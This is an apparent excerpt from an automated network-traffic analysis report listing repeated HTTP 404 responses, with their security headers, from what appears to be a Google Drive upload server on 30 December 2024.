                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5tJHf4H4wg8BLFJONSAHJZm-kXJ9zP2gE6Yl9g5q0nXxIKHP3RGju89wN_uQJfeP4fContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:21 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-v9oVnnLZ_TdbiTuMsckhvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7NrePA23nqr-8VPuk6xdVxqE0KvVtHdWOjxKsVlOH960v7IzzLABjXhCMmaoOehB39Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:22 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-nWhDCUM-AT6CAjgiwygedw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7_3KorrprvN0ITSvJTREZ9_I7H0v2rbI2RiSyJfPNvJPmZA0nkXnfu0kUR0yIW-pzLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:24 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-hOMixjnidXGtbZf0VuXjjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5KZgvyVJBcXjzp-d0nimYBH1x6KvptOFlwHqy9lBnJq8Hpz17cZAs9ZnjlEXEsHnTJContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:24 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_5AldXTFMO78Tgwb3_UBqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6TLANqvCMWcSrkppG1c48bn83mKgqF89mNPCfLSJ0LsFV_ciBx8gsNBVBUadm-ah2YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:25 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-lh0Xnrz0v29jZ1yKny5Ggg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4XE9ltO5sP3N1Ar8PTH5TeZoZyYCHQYswm3HTkYY2aozOCHcnr1TUfkjZboyloQwjgjW0gL5EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:25 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-DrHxITUWqkpY9zOVZL--eQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78TJ0s7w9-xVrnPC4666qZhtzBpabA4vOB160H6JXYtU6Fdo4rnzdYpAuZ1VKsEXBNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:27 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-3QCZBTHJd1WzjAiyJ7Ckhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7u95LCBikf2VrlPZgsV-yI6nxuqMn2Ojd7VJ5HUViP0ZCF2RixzeZv0yho1ewOmz7HContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:27 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-z7XQUqKBFeWkyxMcf_-bXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6crF2b7FSSTausPhad_4aDlZpOp8Brm48BUTsUxCBmURGshwiTp9F1tflMuoY3Q8yLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:29 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-LvSAwuG9HlrbjnO4JLmlYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4aikY1hqp2JJwd_UVjRDghR_eADDFrb1kjxIdoXxulk6H0qKleGVRTUJNzv2Grlb4iH4J0CYEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:29 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wcZe5jZLEzFE417kITNx4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6EPYnsdxaBmwEzi3oy1xasAkPzCYoNSGeyMsE1cGSNvC1X7G2LjMv8A-wfiQsKaUpEsVzlc10Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:30 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Vgj3aQ7owv7-FjrEcxeqhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Cu1NUzd1xt5FYFxcONGcm_PxAcuGzuznSwVVcy8m3_pue8yP4m8t1Nm8JX3NBtxs1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:30 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-lp1vjZwqRCu2CrdcRbpMNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5tB4ZSa22yKLtARIbndnmCJ_oZwwz63dpCk6Q_ClVYxd45NWERMSX98p1rv-5YSq8ofNhGwZQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:31 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EaziQ_cIt_9Dlp5jb-QkzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC729wdkrE3hx8FyEGT0hnE-4MeTLK1MKnDV4cFtLG8bZ-wtfmQzpbuxegoYmQxJxJ6VContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:32 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-t4qd5EpHE6LSIUYWXf1fuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7sj2j0nbUHWk1a5MgCGDq7rq6fA_d6BnPp2IlmRb9N17Ccrw-Bk9CY9lue5ylHeftKDl3sDyoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:32 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-B-5r0DGtruTCPj1clq-u1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6H__jp48lMPl_U3TEFh-FoqSc_MvrIze9ez4eSG4gcR3B17k6gHjs1gX-KasSHhGU-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:33 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-yMgLJlmvrUBIyazQiUz9OA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Ay4RxBpc96w1vGaisqgXZN6kJlSI3CW79YcffGF3PvAOJmsFfwtL5PIqpHjCQVifjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-YHmc-ArVDg9jrLUeHyxWNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5n2jGEQCWLlQS-h6XieblUAo3rIkMj6uEeYyi8ldX-QWx4vY9N6Mkjw5-Sx07s_GvKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:35 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-jjmdGFN99Fr0H8FCWxmiWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6sEKpj7K2JTFM2i5m0S7mYHMXxHbY36vpIt1vd315tHLee4YA71LlDnZupTa_o8C0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:36 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-InuDqAYtm78iwzwKmEjFOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4WHAfbb6IRukLwpSyevePuFa4_SwhQJjEJNRHx1Q3Kri0GfJRN-pdJ1paAks6hZvA2f4n-uQkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:36 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-HXdeOlWWtJ0GBordlk7n-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
